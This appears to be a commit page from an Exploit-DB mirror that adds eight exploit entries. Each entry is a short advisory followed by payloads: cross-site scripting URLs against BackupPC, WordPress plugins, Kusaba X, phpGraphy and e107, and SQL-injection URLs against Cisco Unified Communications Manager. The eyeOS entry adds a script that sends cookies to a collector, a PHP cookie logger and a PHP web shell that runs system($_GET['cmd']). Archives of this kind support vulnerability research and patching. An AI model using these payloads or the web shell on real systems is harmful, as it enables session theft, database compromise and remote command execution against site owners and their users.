bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-04

Browse source 
8 new exploits
This commit is contained in:
Offensive Security 2015-01-04 08:36:28 +00:00
parent d83f13c6d1
commit e60ec300be
9 changed files with 2439 additions and 2305 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4618
files.csv
View file

File diff suppressed because it is too large Load diff

8
platforms/cgi/webapps/35676.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/47628/info
BackupPC is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.cgi?action=browse&host=localhost&num=99999%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/index.cgi?action=RestoreFile&host=localhost&num=1&share=%3Cscript%3Ealert%28234%29%3C/script%3E&dir=

8
platforms/jsp/webapps/35672.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/47607/info
Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20--
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20--

9
platforms/php/webapps/35673.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47620/info
The Daily Maui Photo Widget plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Daily Maui Photo Widget plugin 0.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/daily-maui-photo-widget/wp-dailymaui-widget-control.php?title=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

9
platforms/php/webapps/35674.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47622/info
The WP Photo Album plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP Photo Album 1.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=wp-photo-album/wppa.php&tab=del&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

9
platforms/php/webapps/35675.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47626/info
Kusaba X is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Kusaba X 0.9.2 are vulnerable.
http://www.example.com/kusabax/animation.php?board=b&id=1"><script>alert(&#039;XSS&#039;)</script><"

25
platforms/php/webapps/35677.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/47629/info
eyeOS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input passed through image content before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to eyeOS 1.9.0.3 are vulnerable.
<!doctype html>
<script>
var http = new XMLHttpRequest()
var url = "http://localhost/report.php?" + "user=" + top.document.title + "&cookie=" + document.cookie;
http.open("GET", url, true);
http.send("");
</script>
<?php
$usercookies = fopen("usercookies", "a");
fwrite($usercookies, "User: " . $_GET['user'] . "\t" ."Cookie: " . $_GET['cookie'] . "\n");
?>
<?php
system($_GET['cmd']);
?>

9
platforms/php/webapps/35678.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47634/info
phpGraphy is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpGraphy 0.9.13b is vulnerable; other versions may also be affected.
http://www.example.com/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

49
platforms/php/webapps/35679.txt Executable file
View file

@ -0,0 +1,49 @@
_____ _____ ______
| _ | | _ ||___ /
| |/' |_ __| |_| | / /
| /| \ \/ /\____ | / /
\ |_/ /> < .___/ /./ /
\___//_/\_\\____/ \_/
by bl4ck s3c
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
# Vulnerability Description:
CMS user details section is vulnerable to XSS. You can run XSS payloads.
XSS Vulnerability #1:
Go Update user settings page
"http://{target-url}/usersettings.php"
Set Real Name value;
"><script>alert(String.fromCharCode(88, 83, 83))</script>
or
"><script>alert(document.cookie)</script>
========
Credits:
========
Vulnerability found and advisory written by Ahmet Agar.
===========
References:
===========
http://www.0x97.info
htts://twitter.com/_HacKingZ_